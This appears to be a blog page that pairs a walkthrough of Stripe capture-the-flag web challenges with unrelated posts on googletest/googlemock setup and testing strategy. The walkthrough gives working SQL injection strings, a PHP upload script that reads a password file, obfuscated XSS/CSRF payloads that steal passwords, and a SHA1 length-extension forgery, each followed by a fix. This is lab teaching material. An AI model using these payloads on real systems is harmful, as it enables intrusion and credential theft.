SELECT * FROM secrets WHERE key LIKE % || ".%"
This has the effect of telling the database to return all key pairs in the database – including the key to level 1.

One of the things to note is that the hack needs to be performed either from the text input box on the page, or from a tool such as cURL

The Fix

Never trust data from the client. This would’ve been fixed by limiting the type of data allowed to be submitted and sanitising it before execution.

Level 1

The Brief

We’re told that this machine is secure and we’ll have to try all possibilities but something is off with the code.

The Hack

The code is provided in the form of a PHP file which features the following snippet:

<?php
	$filename = 'secret-combination.txt';
	extract($_GET);
	if (isset($attempt)) {
		$combination = trim(file_get_contents($filename));
		if ($attempt === $combination) {
			echo " $next<p>How did you know the secret combination was" . " $combination!? $next</p>";
			$next = file_get_contents('level02-password.txt');
			echo " $next<p>You've earned the password to the access Level 2:" . " $next</p>";
		} else {
		  	echo " $next<p>Incorrect! The secret combination is not $attempt $next</p>";
		}
	}
?>

What happens here is that the password submitted is tested against a value read in from $filename using the function file_get_contents which will read the given file into a string but if the call is unsuccessful it will simply return an empty string.

If we look at the extract() function, we can see it extracts variables into the variable namespace, overriding any existing ones. Note that $filename is declared, then extract() is called and then it is used.

By combining these things, we can override the value $filename to a non-existent file to get a comparison between two empty strings. To use this we simply visit: https://level01-2.stripe-ctf.com/user-USERNAME/?attempt=&filename=

The Fix

Again, don’t trust data from users! Using extract into the current symbol table means your variables can be overwritten – especially on $_GET variables that can be submitted by users. For any web API, you should know what parameters are expected and to check for those explicitly.

A safer way to code this would have been:

<?php
$filename = 'secret-combination.txt'; if (isset($_GET['attempt'])) { $combination = trim(file_get_contents($filename)); if ($attempt === $combination) { echo " $next<p>How did you know the secret combination was" . " $combination!? $next</p>"; next = file_get_contents('level02-password.txt');
echo " $next<p>You've earned the password to the access Level 2:" . " $next</p>"; } else { echo " $next<p>Incorrect! The secret combination is not $attempt $next</p>";
} } ?>

Level 2

The Brief

We’re given access to Stripe’s Social Network “which are all the rage” and told to fill in our profile picture and that there’s a file called password.txt that contains the password for level 3.

The Hack

Again, we’re provided with the source code that shows that we can upload an arbitrary file to the /uploads directory! Oh dear.
The hack here is to upload a simple PHP script, which we’ll call foo.php, that contains the following

<?php
	echo "Password is: " . file_get_contents("../password.txt");
?>

and then visit https://level02-4.stripe-ctf.com/user-USERNAME/uploads/foo.php to see the password for level 3. The ability to upload our own scripts is a useful ability… one that is used later one to good effect!

The Fix

Check what gets uploaded by your users. You can discard any file types that aren’t acceptable as well as forbidding access to scripts in the uploads directory.
There are various examples of scripts that will perform some kind of sanity check on uploaded files. A simple search for php validate image upload will provide plenty of examples to use as a starting point.

Level 3

The Brief

We’re told that the new storage mechanism uses a human login and that user ‘bob’ holds the password for level 3.

The Hack

This is another case of SQL injection. In this case the offending line is the query string

    query = """SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' LIMIT 1""".format(username)
    cursor.execute(query)

    res = cursor.fetchone()
    if not res:
        return "There's no such user {0}!\n".format(username)
    user_id, password_hash, salt = res

    calculated_hash = hashlib.sha256(password + salt)
    if calculated_hash.hexdigest() != password_hash:
        return "That's not the password for {0}!\n".format(username)

We can see that we can tag on some SQL of our own in this scenario, in this case we want to make use of SQLs UNION statement.

UNION allows you to combine two or more result sets from multiple tables together. We’re going to use this to turn the statement into the following (note that {0} is replaced with our injection string):

SELECT id, password_hash, salt FROM users WHERE username = 'NULL' UNION SELECT id, HASH_WE_KNOW, SALT_WE_KNOW FROM users WHERE username = 'bob' -- LIMIT 1"

The bold text is the string we’re going to insert, the -- at the end is used to comment out the LIMIT 1 part of the query.

So we have the query string but we need to get our hash and salt so we can complete it. The sample above featured the line:


    calculated_hash = hashlib.sha256(password + salt)
    if calculated_hash.hexdigest() != password_hash:
        return "That's not the password for {0}!\n".format(username)

We can simply use our python interpreter to do the hard work for us to generate the requisite hexdigest from a password of ‘xx’ and a salt of ‘x’ to keep things simple:

[nick@slimtop ~]$ python
Python 2.7.3 (default, Jul 24 2012, 10:05:39) 
[GCC 4.7.0 20120507 (Red Hat 4.7.0-5)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import hashlib
>>> print hashlib.sha256('xx' + 'x').hexdigest()
cd2eb0837c9b4c962c22d2ff8b5441b7b45805887f051d39bf133b583baf6860

All that’s left is to enter the query string NULL' UNION SELECT id, 'cd2eb0837c9b4c962c22d2ff8b5441b7b45805887f051d39bf133b583baf6860', 'x' FROM users WHERE username = 'bob' -- as the username and set our password to be ‘xx’ and in we go.

The Fix

This is a far more complex fix to implement, as one really has to think like a cracker however, a good starting point would be
The SQL Injection Prevention Cheat Sheet from the Open Web Application Security Project

Level 4

The Brief

We’re told about a piece of software called Karma Trader that allows people to reward others with karma for good deeds – the caveat being that

In order to ensure you’re transferring karma only to good people, transferring karma to a user will also reveal your password to him or her.

The Hack

The presence of the jQuery library is a good indicator that we’re going to be doing something untoward using it. The hack here is a very simple XSS exploit to make use of the fact that our password will be shown to people we transfer karma to. We simply set our password to be a piece of jQuery code that will use the jQuery.post() function to send some karma to our user naughty_man

So we create our account as naughty_man with the password of <script>$.post("transfer", {to: "naughty_man", amount: "50"} )</script> and send some karma to karma_trader.
When she next logs in, she will unknowingly execute our script which will send us some karma and her password for the next level.

The Fix

As before – the primary concept is not to trust any input that comes from the user. The input fields should be URL encoded and escaped to ensure that they are safe. Again, The SQL Injection Prevention Cheat Sheet from the Open Web Application Security Project provides a good starting point.

Level 5

The Brief

We’re told about a new type of federated identity system where you provide a username, password and pingback URL where a simple “AUTHENTICATED” or “DENIED” is posted to the pingback location.
We’re also informed that we will need to authenticate as a user of level 5 and that it can only make outbound requests to other stripe-ctf.com servers.

Interestingly, we’re told that someone forgot to firewall off the high ports from the Level 2 server.

The Hack

There are two parts to this hack, get authenticated at a lower level and then pingback to gain authentication at level 5.
To accomplish the first part, we need to get a stripe-ctf.com server to provide us with an ‘AUTHENTICATED’ string, Fortunately for us, we still have access to level 2!

Looking at the code, we can see the regex that is used to authenticate:

	def authenticated?(body)
		body =~ /[^\w]AUTHENTICATED[^\w]*$/
	end

We simply upload a script, stripe_auth.php, to print that string out:

<?php
print " AUTHENTICATED \n"; /* Note the spaces either side are matched for! */
?>

We can then specify this location as our pingback URL to gain initial authentication at level 2 – http://level02-2.stripe-ctf.com/user-USERNAME/uploads/stripe_auth.php

The second part required a bit of lateral thinking – reading our logged in page we can see it says:

You are authenticated as hacker@level02-2.stripe-ctf.com

The word authenticated here is enough to say we’re authenticated as level 5! – To use it we just tell it to use itself by specifying a pingback URL of:
https://level05-1.stripe-ctf.com/user-USERNAME/?pingback=http://level02-2.stripe-ctf.com/user-USERNAME/uploads/stripe_auth.php

This provides us with the password for our next level!

The Fix

Once again – we should not trust any input provided by the user. If we are going to allow some kind of authentication server, then we need to be able to trust the remote server. Taking it on the word of a user is not good enough!

We should either have a hard coded list of servers that we trust, or implement some kind of trust mechanism – such as public key cryptography

Also, the fatal flaw in the design was to include the keyword for authentication within the level 5 server output.

Level 6

The Brief

We’re told that after the catastrophe of level 4 the Karma Trader was shutdown but a new service, Streamer, was created. The security of this app has been beefed up and the password of the first user contains double quotes and apostrophes to complicate things… but that it’s also the password to level 7

The Hack

Looking through the source code for Streamer for these so-called precautions we come across the following lines of code:

   def self.safe_insert(table, key_values)
      key_values.each do |key, value|
        # Just in case people try to exfiltrate
        # level07-password-holder's password
        if value.kind_of?(String) &&
            (value.include?('"') || value.include?("'"))
          raise "Value has unsafe characters"
        end
      end

This forbids any insertion of values containing either an apostrophe ‘ or double quote ” – Very important!

To explore the site a bit more, we create an account and have a look at how the posts are stored and manipulated. In the HTML we see the following:

<script>
      var username = "naughty_man";
      var post_data = [{"time":"Fri Aug 24 19:54:42 +0000 2012","title":"Hello World","user":"level07-password-holder","id":null,"body":"Welcome to Streamer, the most streamlined way of sharing\nupdates with your friends!\n\nOne great feature of Streamer is that no password resets are needed. I, for\nexample, have a very complicated password (including apostrophes, quotes, you\nname it!). But I remember it by clicking my name on the right-hand side and\nseeing what my password is.\n\nNote also that Streamer can run entirely within your corporate firewall. My\nmachine, for example, can only talk directly to the Streamer server itself!"}];
       function escapeHTML(val) {
        return $('
').text(val).html(); } function addPost(item) { var new_element = '<tr><th>' + escapeHTML(item['user']) + '</th><td><h4>' + escapeHTML(item['title']) + '</h4>' + escapeHTML(item['body']) + '</td></tr>'; $('#posts > tbody:last').prepend(new_element); } for(var i = 0; i < post_data.length; i++) { var item = post_data[i]; addPost(item); }; </script>

So interestingly, we can see that the posts are stored in a way that can be maliciously escaped with an errant </script> tag – we can test it by posting </script><script>alert(0);</script> and checking that the alert window is visible after a refreshing the browser window – success.

What we want to do is read in the contents of ‘user_info’ that we can see holds the current users password and make sure that we don’t use any single or double quote characters as submitting these is not allowed – quite the challenge.

Fortunately for us, we can use jQuery.get() to retrieve a page for us and we can also force the browser to then submit this page (or the last 180 characters of it) in the form provided without any user intervention – This type of attack is called a Cross Site Request Forgery.

What we will do is:

// Get the page 'user_info' into a string with the jQuery function
$.get('user_info'), function(data){
	// Remove all of the string apart from the last 180 characters to keep it short
	data = data.substr(data.length - 180);
	// Replace any double quotes with the text 
	data = data.replace('\"','<DOUBLE>');
	// Replace any single quotes with the text 
	data = data.replace('\'','<SINGLE>'); 
	// We know there's only one form so set it's value to be our data
	document.forms[0].content.value = data;
	// We know there's only one form so 'click' submit on the first form of the document
	document.forms[0].submit(); 
});

One problem we have is that we typically need to use quotes to demark strings in our JavaScript which are forbidden but fortunately we can use a combination of JavaScript’s eval() operation and String.fromCharCode to accomplish what we need.

String.fromCharCode() will allow us to encode forbidden characters that will be replaced at runtime by the eval() function – such that alert('Hi') becomes, alert(eval(String.fromCharCode(39, 72, 105, 39))).

So knowing this, we can create our script and then convert it to using eval/String.fromCharCode so that our naughty script goes from…

}];// </script><script>$.get('user_info'), function(data){ data = data.substr(data.length - 180); data = data.replace('\"',''); data = data.replace('\'',''); document.forms[0].content.value = data; document.forms[0].submit(); });</script> 

to this.

}];// </script><script>$.get(eval(String.fromCharCode(39, 117, 115, 101, 114, 95, 105, 110, 102, 111, 39)), function(data){ data = data.substr(data.length - 180); data = data.replace(eval(String.fromCharCode(39, 92, 34, 39)),eval(String.fromCharCode(39, 60, 68, 79, 85, 66, 76, 69, 62, 39))); data = data.replace(eval(String.fromCharCode(39, 92, 39, 39)),eval(String.fromCharCode(39, 60, 83, 73, 78, 71, 76, 69, 62, 39))); document.forms[0].content.value = data; document.forms[0].submit(); });</script> 

Finally, we can insert this into the stream (preferably with JavaScript disabled unless you want to run it yourself!) and wait for the first user to log in and unwittingly execute our script and post their valuable credentials.

The Fix

By now, we should be totally paranoid about any input data! Be sure to strip, encode or filter and reject user data if it contains any HTML characters with safe alternatives such that so that ‘<‘ becomes
&lt;. A read of the Secure-Programs-HOWTO is a good way to become aware of the ways that users can trick you into running bad code.

Level 7

The Brief

For level 7, we are introduced to an on-line waffle ordering system. There are two levels of waffles that can be ordered, standard waffles and ‘premium’ waffles. We only have access to the standard waffles, but we need to be able to place on order for a premium waffle to reveal the password for the next level.
We are provided with an API to the ordering system along with our secret key and a page (/logs/<user_id>)where we can view any previous orders we may have placed.

The Hack

The API for the system attempts to be secure by using a message signing system. There are two parts to the order, the parameters of count, user_id, latitude, longitude and waffle. These are then signed with an SHA1 algorithm using our secret key. This would give a string such as:

count=1&lat=0&user_id=5&long=0&waffle=liege|sig:a2f7af47b2633dd00f94d204e03d2a3f9a012674

This means we can exploit a
SHA padding attack
. This enables us to create a valid SHA1 key without knowing the original secret

The design of the system allows to find the order log of any user by changing the user ID on the logs page. From this we can get an original order from a privileged user:

count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo|sig:5fe387f05d3b205b6d10108c8f31312c8fd56711

There are tools that can generate SHA padding:

We want to add the parameter waffle=liege to the parameters, and using the tools we get a new string of:

count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x028&waffle=liege|sig:c0b55677bf18c7b48a32f1f705667e11008b93b2

The Fix

The first reason why we are able to use this hack is because it is very simple to find the logs of other users – these should be protected – and the second reason is because the input has not been sanitised correctly.
The code used is:

def parse_params(raw_params):
    pairs = raw_params.split('&')
    params = {}
    for pair in pairs:
        key, val = pair.split('=')
        key = urllib.unquote_plus(key)
        val = urllib.unquote_plus(val)
        params[key] = val
    return params

This allows the same key to be submitted twice, and the second time it will overwrite the value of the first.

By changing the code to something like the following:

def parse_params(raw_params):
    pairs = raw_params.split('&')
    params = {}
    for pair in pairs:
        key, val = pair.split('=')
        key = urllib.unquote_plus(key)
        val = urllib.unquote_plus(val)
        if not key in params:
            params[key] = val
    return params

the second instance of ‘waffle’ would have been ignored.

Level 8

The Brief

For level 8 we had to crack a new password storing mechanism. To supposedly increase security, a password is split between four separate servers – so that even if one server was compromised, the password would still be secure. To check a password, a 12 digit password was submitted to the main server and it would simply return ‘success’ or ‘failure’.

The system also provided a webhook that would be called by the main server to return the result of the password attempt.

To make life more interesting, the password server had been firewalled, so that it could only be reached from another stripe-ctf.com server and in addition to this, the system has delays inserted safe to prevent timing attacks such that the main server always returned the success or failure of a password in a consistent time.

The Hack

We knew from previous levels, that we could launch our attack from the compromised level 2 server – so that was one part of the challenge solved.

Looking at the design of the algorithm, it was fairly obvious that the fundamental flaw was that by splitting the key into 4 chunks of 3 digits, it greatly reduced the possible combinations from 1012 to 103 which is feasible to attack by brute force.

The first attempt at cracking this involved finding the four servers by sweeping through the port numbers for a valid response and then attacking each of chunk servers in turn. While this worked locally – it failed on the stripe servers as the chunk servers were firewalled and could not be reached from the level 2 server…

By going back to the logs, we finally noticed the second flaw in the system. The main server split the 12 digits into chunks and submitted the chunks to the chunk servers in turn. However, if any of the chunk servers returned a failure, then for efficiency, the main server stopped checking and returned the result to the server specified in the webhook. This actually turned out to be the key flaw in the system, as the webhook could look at the successive client port numbers from the main server and work out how far along the system it had got (client port numbers are assigned sequentially – so the each call to a chunk server would use a port number – therefore the fewer port numbers used between calls indicated that the password failed early).

Therefore it became possible to brute force the first chunk by looking for a port difference of 2, the second chunk for a port difference of 3 and for chunk 3 a port difference of 4.

The Fix

Aside from the flaw in the system that reduced the possible combinations to a point where it became feasible to brute force the attack – the main flaw that allowed the attack to succeed was the shortcut of not submitting all the chunks to all the servers each time.
While this may have seemed like a good idea for computational efficiency, it proved to be the weak link that could then be exploited.

Conclusion

Hopefully this has been a useful and insightful article on the many ways that web applications can be attacked – just today Google published an article about how difficult content hosting on the modern web has become and if those sorts of players are struggling with it then it’s a very serious issue indeed.

You should sign up for our mailing list to hear about our latest blog articles and exciting new course offerings and if you have insight or alternative solutions we’d love to hear about them in the comments.

Setting up googlemock with Visual C++ 2010 Express Edition

March 15th, 2012

Following on from my last post about setting up googletest to use with Visual Studio 2010 express edition, this post builds on that by showing how to build, setup and test the googlemock libraries.

If you have read the previous post, then the basic steps are very similar.

First, download the googlemock zip file and unzip it to known location. As before, I suggest something easy, either C:\gmock-1.6.0, or as in my case C:\src\gmock-1.6.0. One useful fact is that all the gtest code is included as part of the gmock distribution. It can be found at \gmock-1.6.0\gtest.

Building the gtest libraries

It is the same process as build the gtest libraries. One importany note is that

The gmock libraries contain all the gtest code as well.

Navigate to the directory \gmock-1.6.0\msvc\2010 and open the Visual C++ project gmock (gmock.sln). You will end up with three projects.

image

Go ahead and build these (F7) and ignore any warnings. Once successfully built, look in the directory \gmock-1.6.0\msvc\2010\gtest\Debug and you will find two library files

  • gmock.lib
  • gmock_main.lib

Test the GMock Library

As part of the standard build two executable are created that allow a quick self-test of googlemock (gtest does have the same but I neglected to mention those in my previous post).

I recommend opening a command window and navigating to directory  \gmock-1.6.0\msvc\2010\Debug. There you will fine the file gmock_test.exe; go ahead and execute that [NOTE: I had two (of the 830) tests fail, which I’m not sure why (yet) – to be investigated]

image
This indicates that (most of) gmock functions correctly.

Building a Base GMock Project

A gmock project is the same as  a gtest project but with different project properties. Create a newWin32 Console Application  project.  Add a test fixture file to the project:

testFixture.cpp
  1. #include “gtest/gtest.h”
  2. TEST(setup_test_case, testWillPass)
  3. {
  4.     EXPECT_EQ(42, 42);
  5. }
  6. TEST(setup_test_case, testWillFail)
  7. {
  8.     EXPECT_EQ(42, 0);
  9. }

and exclude file containing default main from build.

Modify the project properties (Alt+F7) as follows:

  • Set gmock and gtest header include directories
    • C/C++ -> General -> Additional Include Directories
      • \gmock-1.6.0\include
      • \gmock-1.6.0\gtest\include
  • Add gmock libraries (instead of gtest libs)
    • Linker -> General -> Addition Library Directories
      • \gmock-1.6.0\msvc\2010\Debug
    • Linker -> Input -> Additional Dependencies
      • gmock.lib
      • gmock_main.lib
  • Modify Runtime Library:
    • C/C++ -> Code Generation -> Runtime Library
      • Multi-threaded Debug (/MTd).

Note here that we don’t have to include the gtest libraries as these are embedded in the gmock libraries. Build and run and we will see the familiar gtest output:
image

To test the gmock setup we need to create two classes:

  • The class to become the Unit-Under-Test (UUT)
  • An interface class that the UUT calls upon, which doesn’t have any implementation (or the implementation is target/hardware specific).

Interface Class

IWidget.h
  1. class IWidget
  2. {
  3. public:
  4.     virtual void On() = 0;
  5.     virtual void Off() = 0;
  6. };

Unit Under Test

WidgetController.h
  1. class IWidget;
  2. class WidgetController
  3. {
  4. public:
  5.     WidgetController(IWidget& w);
  6.     ~WidgetController(void);
  7.     void exec();
  8. private:
  9.     IWidget& myWidget;
  10. };
WidgetController.cpp
  1. #include “WidgetController.h”
  2. #include “IWidget.h”
  3. WidgetController::WidgetController(IWidget& w):myWidget(w)
  4. {
  5.     myWidget.Off();
  6. }
  7. WidgetController::~WidgetController()
  8. {
  9.     myWidget.Off();
  10. }
  11. void WidgetController::exec()
  12. {
  13.     myWidget.On();
  14. }

Testing using the Mock framework

To test using the Mock we need to:

  1. Include the gmock header [line 3]
  2. Create a mock class derived from the Interface class [lines 7-12]
  3. Create a test where the UUT calls on the interface on the mock object [lines 16-23]
  4. Set the mock objects expectation [line 20]. The mock expectation is that the Off member function will be called twice, once during WidgetController construction and once during destruction.
Using the mock
  1. // testFixture.cpp
  2. #include “gtest/gtest.h”
  3. #include “gmock/gmock.h”
  4. #include “IWidget.h”
  5. class MockWidget : public IWidget
  6. {
  7. public:
  8.     MOCK_METHOD0(On, void());
  9.     MOCK_METHOD0(Off, void());
  10. };
  11. #include “WidgetController.h”
  12. TEST(TestWidgetController, testConstructor)
  13. {
  14.     MockWidget mw;
  15.     EXPECT_CALL(mw, Off()).Times(2);
  16.     WidgetController wc(mw);
  17. }

Build and run

image

You can see gmock in action by simply changing the expectation, e.g. [line 6]

Failing Test
  1. TEST(TestWidgetController, testConstructor)
  2. {
  3.     MockWidget mw;
  4. //    EXPECT_CALL(mw, Off()).Times(2);
  5.     EXPECT_CALL(mw, Off());
  6.     WidgetController wc(mw);
  7. }

will result in the following failed test output:

image

Where next?

Once you have a working project, the documentation on the Googlemock site is excellent. Start with Googlemock for Dummies.

Setting up googletest with Visual C++ 2010 Express Edition

March 7th, 2012

So on an Embedded, Real-Time blog why am I taking about Visual C++ and googletest?

With the growth and acceptance of agile techniques, such as Test Driven Design (TDD), which is very well explained in James Grenning’s book Test Driven Development for Embedded C, we now have a set of tools and techniques that are:

  • Natural to use (as they use the native language)
  • Easy to use (to varying degrees)
  • Free

that allow the quality of embedded software to be significantly improved prior to target based testing.

However, It is important to note that TDD does not solve (or even address) may of the complications of developing and testing software for an embedded environment, but at the same time it should not be ignored.

So why Visual C++ express edition and googletest?

First, Visual C++ is not my first tool of choice, this selection came from working with a customer, it was their choice. Saying that, the express edition is free to use (I am assuming you will be using a professional cross-complier for target development) and it has become one of the best standards conforming C++ compilers around. Also I am not claiming to be a Visual C++ expert as I don’t develop software targeted at Windows.

googletest (gtest) is, in my experience to date, by far the easiest unit testing framework around for testing C++. For testing C I prefer Unity, which I’ll discuss in a later post. googletest is also supported by googlemock (gmock), which is an essential part of being able to use a unit testing framework for host testing of embedded software (my next post will look at setting up gmock). Finally, gtest was also part of the customers requirements.

As with many of these projects, all the information is out there, but what I hope to do is save you a little of the pain I went through getting the project setup and working.

I will assume you have Visual C++ 2010 express edition installed, if not go ahead and install it following the default Microsoft process.

Next, download the googletest zip file and unzip it to known location. I suggest something easy, either C:\gtest-1.6.0, or as in my case C:\src\gtest-1.6.0.

Building the gtest libraries

This couldn’t be easier. Simply navigate to the directory \gtest-1.6.0\msvc and open the Visual C++ project gtest (gtest.sln).

image

You will be asked to convert the project from an older format to a newer one. Go ahead and do this. Finally you’ll end up with four projects:

image

Go ahead and build these (F7) and ignore any warnings. Once successfully built, look in the directory \gtest-1.6.0\msvc\gtest\Debug and you will find two library files

image

These are Debug build libraries (the ‘d’ in the library name indicates this). If you want Release build libraries then change the build option to Release and rebuild. You will find the library files gtest.lib and gtest_main.lib in \gtest-1.6.0\msvc\gtest\Release. However, for the purposes here I’m assuming we only need to work with Debug builds.

Building a Visual C++ gtest Project

The key steps to build a gtest project are:

  • Create a new project
  • Win32 Console Application
  • Add test fixture file
    • and remove default main
  • Configure project properties
    • Additional Include Directories
    • \gtest-1.6.0\include
  • Add gtest (debug) libraries
    • gtestd.lib
    • gtest_maind.lib
  • Modify Runtime Library:
    • Multi-threaded Debug (/MTd)

    Read more »

    Effective Testing: The “Swiss Cheese” model

    December 20th, 2011

    Why do we test?

    Software development is a collaborative effort. You bring in input from customers, managers, developers, and QA and synthesize a result. You do this because mistakes in requirements or architecture are expensive, possibly leading to lost sales.

    When we develop products we want them to be successful. We want our customers to buy, enjoy, and recommend our products or services. In other words, we want to build quality products. In this case, quality means four inter-related things:

    • Compliance quality– Can we demonstrate that the software fulfils its requirements?
    • Intrinsic quality – is the product robust, reliable, maintainable, etc?
    • Customer-perceived quality – How does the customer react to our product on a sensory, emotional level?
    • Fitness for Purpose– does our product fulfil the stakeholder’s needs?

    Which of these types of quality is most important to us depends a lot on our problem domain and the goals and driving forces of our business.

    We take considerable pains (but not enough in most cases – but that’s a different argument!) to analyse, design and implement our system to meet our quality goals. Unfortunately, engineers are not perfect. They are under increasing pressure to deliver more features, in less time, and as a consequence they do not have the luxury of time to learn the problem domain, or examine their solutions.

    As a consequence engineers make mistakes. These mistakes appear as corruptions in the translation from a specification (what to do) to an implementation. An error can occur wherever we translate a specification to an implementation.

    clip_image002

    Figure 1 – Typical errors in embedded systems

     

    This raises an important question – how to you measure confidence in a product? That is, how do we know the quality of our product is good enough that we can release it for production?

    The simple answer is: we test.

    Or, perhaps more correctly: we perform validation and verification activities.

    A note on definitions

    for this article I will use the following meanings for validation and verification. I’m being explicit because every development group I’ve spoken to uses a different word (or combination of them!) to describe the same concepts.

    Verification

    Verification confirms some predicate about the system. Verification confirms the existence (or non-existence) of, state of, value of, some element of the system’s behaviour or qualities. Put simply, verification asks questions that yield a yes/no answer.

    Validation

    Validation is focused on assessment of system predicates, rather than their confirmation. In other words, validation asks the question: should the system actually perform a particular behaviour or have a particular quality. Validation assesses the system in terms of good/bad.

    Just to confuse matters, I will use the terms validation and verification (V&V) and testing interchangeably.

    Introducing the “Swiss Cheese” approach to testing

    Testing is often the last resort for finding mistakes. A requirements specification is produced, a design created and implemented. Then, testing is used to verify the design against the requirements and to validation both the design and the requirements. Testing cannot be a perfect technique. Done poorly, many faults will still remain in the system.

    image

    Figure 2 – The cost of finding – and fixing – a bug

     

    This is a well-known graph. It shows the (relative) cost of finding – and fixing – a fault in a system throughout the lifecycle of the project. In simple terms it shows that it can cost orders of magnitude more to find and fix a problem at the end of the development lifecycle than during the early stages; and even more once the project is in service.

    A key point to note is: Testing does not improve your software. Testing is not about proving the software has no faults. (This is impossible!) Testing is a quality improvement technique. It provides evidence – in the form of testing metrics – to support the engineers’ claims (that their design works and is valid).

    Just testing the software doesn’t make it better:

    • Testing just identifies the faults

    Fixing the faults makes the software better (although, not always!)

    And simply writing more tests won’t make your software better – You must improve your development practices to get better software. The more testing you do the better your product confidence should be – provided you perform good tests!

    Closing the holes (improving) testing requires effort and costs money. Moreover, the more sophisticated, rigorous and detailed you make any particular testing technique the more it will cost. In fact, there is a non-linear increase in the costs of applying a technique:

    image

    Figure 3 – The cost of improving any particular testing technique

     

    Trying to ‘perfect’ one technique – for example, black-box unit testing – is not a cost-effective way to gain product confidence. Using multiple, independent techniques (each playing to their own strengths) is far more effective.

    The “Swiss Cheese” approach to testing uses multiple techniques, each with a different focus. The techniques are applied with the clear knowledge that no technique is perfect (nor should it be) but the flaws in any one technique do not overlap (much!) with the flaws of another layer.

    image

    Figure 4 – the Swiss Cheese model

     

    The Error-Fault-Failure chain

    clip_image010

    Figure 5 – The Error-Fault-Failure chain

     

    The Error-Fault-Failure chain shows the propagation of mistakes through the development lifecycle. Mistakes made by engineers lead to errors; errors are manifested as (latent) faults – code just waiting to go wrong!; in some cases a fault may lead to the system deviating from its desired behaviour – a failure.

    Clearly finding latent faults before they become failures is more effective than just trying to detect failures; and finding errors that lead to latent faults is more effective still.

    Dynamic Testing

    Dynamic Testing focuses on identifying failures.

    Black box testing is concerned with measuring the correctness of the system’s behaviour, performance or other quality. Black box testing is therefore primarily a verification technique.

    Black box testing tests specification without knowledge of implementation. The unit under test is stimulated via its interface(s). Black box testing requires a complete, consistent unambiguous specification to test against.

    Black box testing typically involves isolating a subset of the system and executing it in isolation in a simulated environment.

    White box testing, or Coverage testing is about establishing confidence in the structure of the code. Coverage testing focuses on the rigour of the dynamic testing process.

    Coverage testing is not concerned with verification or validation but with ensuring all code has been adequately exercised. The motivation is that code that has not been executed during testing may have faults in it; and it we don’t check that code the faults may manifest themselves when the system is in service.

    Dynamic testing involves execution of the software in a (simulated and, later in the develop cycle, live) environment.

    clip_image012

    Figure 6 – Environments for executing dynamic tests

     

    Dynamic testing does not find latent faults effectively. The amount of effort required to find potential failures in your code is extremely high.

    Static Testing

    Static testing, using Static Analysis tools, look for latent faults in code.

    Static Analysis tools is a generic description for tools that aid verification without having to execute software.

    There are (currently) more than three dozen tools on the market. Most are commercial tools, but there are many academic-based tools. There are a small number of free- or share-ware tools available, also.

    clip_image014

    Figure 7 – Categorisation of static analysis tools

     

    These tools are nearly always language specific – that is, there are tools for C, C++, Java, etc.

    They are commonly based on compiler technology, since the initial stages of static analysis are the same as those required for compiling code.

    Pattern Matching tools

    Pattern matching tools look for dangerous expressions. .Grep-like tools search for known incorrect patterns. They can be useful for simple latent faults and enforcing style standards in code.

    Semantic Analysis tools

    Semantic analysis tools are based on compiler (parser) technologies. They use the first stages of the compilation process to build an Abstract Syntax tree. The parse tree in enhanced with additional semantic information. The enhanced Abstract Syntax tree is then evaluated against a rulebase looking for violations.

    Symbolic Execution tools

    Symbolic execution tools look at data-flow analysis. Symbolic execution tools are less concerned with language level constructs and instead focus on how data is created used and destroyed.

    Abstract Interpretation tools

    Abstract Interpretation involves treating the code as an abstract mathematical characterisation of its possible behaviour. The model is then executed to examine its behaviour (for faults).

    There is a considerable overlap between Abstract Interpretation, Symbolic Execution and Semantic Analysis in most commercial tools.

    In practice most commercial tools use a number of techniques, both to provide better analysis and also to minimise the shortcomings of each of the techniques.

     

    clip_image016

    Figure 8 – There is considerable overlap between commercial SA tools

     

    Most tools will have a bias towards one particular technique. When choosing a tool it is prudent to consider where the tool’s bias lies and whether that suits your usage of static analysis techniques. In some cases you may consider buying more than one static analysis tool.

    Static Analysis tools focus on the use (or misuse) of programming language. They cannot make any meaningful judgements on design issues – for example cohesion, coupling, encapsulation of abstraction flaws in the system’s design.

    Review

    Judgements on design, system evaluation, measures of good/bad, and other aspects of validation cannot be automated easily. The most effective technique to find mistakes in these aspects is human review.

    In the past reviews have focused on (attempting to) find latent faults in code by detailed inspection. Unfortunately, this is something humans are particularly bad at so it becomes an activity that either 1) takes a long time or 2) is very poorly executed (that is, merely given lip-service).

    The strength of human review is the ability of humans to build abstract representations and evaluate them. Thus reviews should focus on the things tools can’t automate – design, modularisation, evaluation, intrinsic quality, etc.

    Applying the Swiss Cheese model

    In the Swiss Cheese model no technique has to be perfect. Each technique is used for its strengths with the knowledge faults not found by one technique may be caught by another.

    Some faults will still get through, though!

    clip_image018

    Figure 9 – In this Swiss Cheese approach no technique needs to be perfect

     

    The aim is to spread our effort across multiple techniques to get the most effective result for the minimum effort.

    Consider: If we are not particularly diligent with any particular technique, such that each technique only finds 50% of the mistakes at each level, with three different levels we have the potential to find 87.5% of the mistakes in the system. And this without disproportionate effort in any area. (and yes, I know this is a somewhat optimistic and simplistic scenario)

    Importing IAR EW 5.4 Projects into Parasoft C++test

    November 17th, 2010

    Background

    Recently I have been experimenting with Parasoft’s C++test tool for static analysis of C and C++ code. As part of this I went through the process of importing an existing C project developed in IAR’s Embedded Workbench toolset. Even though importing a project and checking it against MISRA-C isn’t too taxing, I though I would share my notes for doing this.

    Read more »

    %d bloggers like this: